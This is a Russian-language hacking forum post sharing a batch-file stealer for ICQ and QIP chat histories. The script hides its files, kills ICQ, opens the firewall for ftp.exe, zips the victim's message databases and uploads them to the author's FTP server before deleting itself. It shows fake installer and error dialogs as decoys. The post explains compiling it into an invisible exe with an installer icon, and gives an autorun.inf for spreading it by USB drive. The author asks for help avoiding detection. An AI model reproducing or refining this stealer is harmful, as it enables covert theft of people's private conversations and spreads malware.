Форум АНТИЧАТ - Крадем историю QIP и ICQ

вот сделал батник тут недавно, впринципе делал ради одной жертвы, но непригодился в последующем...
был бы очень рад каким нибудь дополнениям к нему и усовершенствованиям. также интересует аспект палевности данного батника, хотел бы узнать где он может запалится и на чем если что.

Код:

@echo off

@attrib "%CD%\zip32.exe" +h +s

@attrib "%CD%\ftpserv.cmd" +h +s

@attrib "%CD%\grab.bat" +h +s

@taskkill /f /IM ICQ.exe

@netsh firewall add allowedprogram C:\windows\system32\ftp.exe ENABLE

@mkdir c:\windows\dump_rep

@echo msgbox "........................................................."+chr(13)+chr(13)+"Please wait now..."+chr(13)+chr(13)+"Installing..."+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrt.vbs

@start c:\windows\alrt.vbs

@ping 1.1.1.1 -n 1 -w 10000

@copy "%APPDATA%\ICQ\*********\Messages.mdb" "c:\windows\dump_rep\dump_ICQ.bin" /y

@zip32 "C:\Program Files\QIP\Users" "c:\windows\debug\dump_QIP_new.zip"

@copy "c:\windows\debug\dump_QIP_new.zip" "c:\windows\dump_rep\dump_QIP_new.bin" /y

@del "c:\windows\debug\dump_QIP_new.zip"

@zip32 "%APPDATA%\QIP\Profiles" "c:\windows\debug\dump_QIP_old.zip"

@copy "c:\windows\debug\dump_QIP_old.zip" "c:\windows\dump_rep\dump_QIP_old.bin" /y

@del "c:\windows\debug\dump_QIP_old.zip"

@ftp -s:"%CD%/ftpserv.cmd"

@echo msgbox "........................................................."+chr(13)+chr(13)+"Error 1251"+chr(13)+chr(13)+".........................................................",4096,"The Middler! v.0.133 beta">c:\windows\alrtt.vbs

@attrib "%CD%\zip32.exe" -h -s

@attrib "%CD%\ftpserv.cmd" -h -s

@attrib "%CD%\grab.bat" -h -s

@del "%CD%\zip32.exe"

@del "%CD%\ftpserv.cmd"

@del "%CD%\grab.bat"

@start c:\windows\alrtt.vbs

+ сервер

Код:

o tvoi.ftp.com

login

password

binary

cd dmp

send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin

send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin

send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin

bye

упаковываем этот батник вместе с сервером с помощью Bat To Exe Converter v1.5

как?

1) как главный файл для компиляции выбираем тело граббера
2) настраиваем: Invisible Application, Temporary Directory, Delete At Exit, Overwrite Existing Files
3) на вкладке Include добавляем (Add) файлы : наш фтп сервер (допустим ftpserv.cmd) и прогу для архивации истории и папок квипа - zip32.exe
4) на вкладке Versioninformations добавляем иконку дистрибутива
5) нажимаем Compile
6) готово

как все это работает?

после запуска нашего экзешника в %temp% распакуется 3 файла - тело граббера, фтп сервачок, прога для архивации (консольная) - zip32.exe.
все эти файлы будут скрыты - как "скрытый" и "системный".
дальше убиваем процесс ICQ.ехе - иначе скопировать файлы истории аськи невозможно.
добавляем в исключения вин-файрволла прогу ftp.exe - стандартный фтп клиент для виндовозов.
создаем папку для копии нашей истории - c:\windows\dump_rep.
создаем файл на VBS - простое окно с текстом, якобы установки проги "The Middler" - уж что это за прога итд - тут зависит от вашей фантазии.
делаем паузу в 10 секунд, чтобы все операции были окончательно завершены.
копируем файл истории жертвы из ICQ в нашу папку dump_rep.
архивируем один из возможных путей истории квипа - папку C:\Program Files\QIP\Users.
перемещаем ее тоже в папку dump_rep.
пробуем тоже самое с %USERPROFILE%\Application Data\QIP\Profiles
открываем фтп сервер, который заливает на наш фтп данные файлы.
убираем аттрибуты "скрытый" и "системный" с наших файлов и удаляем их.
запускаем очередное обаманное окно при помощи VBS - мол при установке проги "The Middler" произошла ошибка 1251.

качаем:

Bat To Exe Converter v1.5
zip32.exe
Setup.ico

P.S.
незаываем написать ICQ номер жертвы вот тут:

Код:

@copy "%USERPROFILE%\Application Data\ICQ\NOMER_TUT\Messages.mdb"

P.S.S.
авторан с флехи:

Код:

[autorun] 

shellexecute=compiled.exe

где compiled.exe это наш скомпилированный граббер. только придется удалить "запуск установки The Middler" - чтобы вообще без палева

Тестированно на winlogon.exe